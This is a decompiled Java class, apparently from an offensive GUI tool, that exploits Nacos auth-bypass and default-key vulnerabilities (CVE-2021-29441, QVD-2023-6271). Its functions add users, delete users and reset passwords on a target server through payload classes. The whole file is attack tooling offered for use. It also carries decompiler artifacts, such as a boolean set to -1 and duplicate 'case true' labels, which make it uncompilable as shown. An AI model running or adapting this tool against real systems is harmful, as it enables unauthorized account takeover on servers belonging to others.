package com.alibaba.nacos.common;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.utils.DialogUtils;
import com.alibaba.nacos.utils.ExpList;
import com.alibaba.nacos.utils.Logger;
import javafx.scene.control.TextArea;

/* loaded from: input_file:com/alibaba/nacos/common/NacosExploit.class */
public class NacosExploit {
    public static void exploit(String str, String str2, String str3, String str4, String str5, TextArea textArea) throws Exception {
        if (isValidVul(str2, textArea)) {
            boolean z = -1;
            switch (str.hashCode()) {
                case -1235785559:
                    if (str.equals("add_user")) {
                        z = false;
                        break;
                    }
                    break;
                case 814215039:
                    if (str.equals("del_user")) {
                        z = true;
                        break;
                    }
                    break;
                case 2024128589:
                    if (str.equals("reset_pwd")) {
                        z = 2;
                        break;
                    }
                    break;
            }
            switch (z) {
                case false:
                    addUser(str2, str3, str4, str5, textArea);
                    return;
                case true:
                    delUser(str2, str3, str4, str5, textArea);
                    return;
                case true:
                    resetPassword(str2, str3, str4, str5, textArea);
                    return;
                default:
                    Logger.logInfo(textArea, "无效的命令");
                    return;
            }
        }
    }

    private static boolean isValidVul(String str, TextArea textArea) {
        if (str.equals("Nacos User-Agent 权限绕过漏洞(CVE-2021-29441)") || str.equals("Nacos token.secret.key 默认配置漏洞(QVD-2023-6271)")) {
            return true;
        }
        DialogUtils.showErrorDialog("提示", "漏洞选择错误", "请选择能利用的漏洞Nacos User-Agent权限绕过（CVE-2021-29441） 或者 Nacos token.secret.key默认配置(QVD-2023-6271))");
        return false;
    }

    public static void addUser(String str, String str2, String str3, String str4, TextArea textArea) throws Exception {
        executeExploit(str, str2, "username=" + str3 + "&password=" + str4 + " add", textArea);
    }

    private static void delUser(String str, String str2, String str3, String str4, TextArea textArea) throws Exception {
        executeExploit(str, str2, "username=" + str3 + "&password=" + str4 + " del", textArea);
    }

    private static void resetPassword(String str, String str2, String str3, String str4, TextArea textArea) throws Exception {
        executeExploit(str, str2, "username=" + str3 + "&newPassword=" + str4 + " reset", textArea);
    }

    private static void executeExploit(String str, String str2, String str3, TextArea textArea) throws Exception {
        ExecutionResult exploit = ExpList.getPayload(str).exploit(str2, str3);
        if (exploit.getResult()) {
            Logger.logInfo(textArea, exploit.getResponse());
        } else {
            Logger.logInfo(textArea, "漏洞利用失败");
        }
    }
}
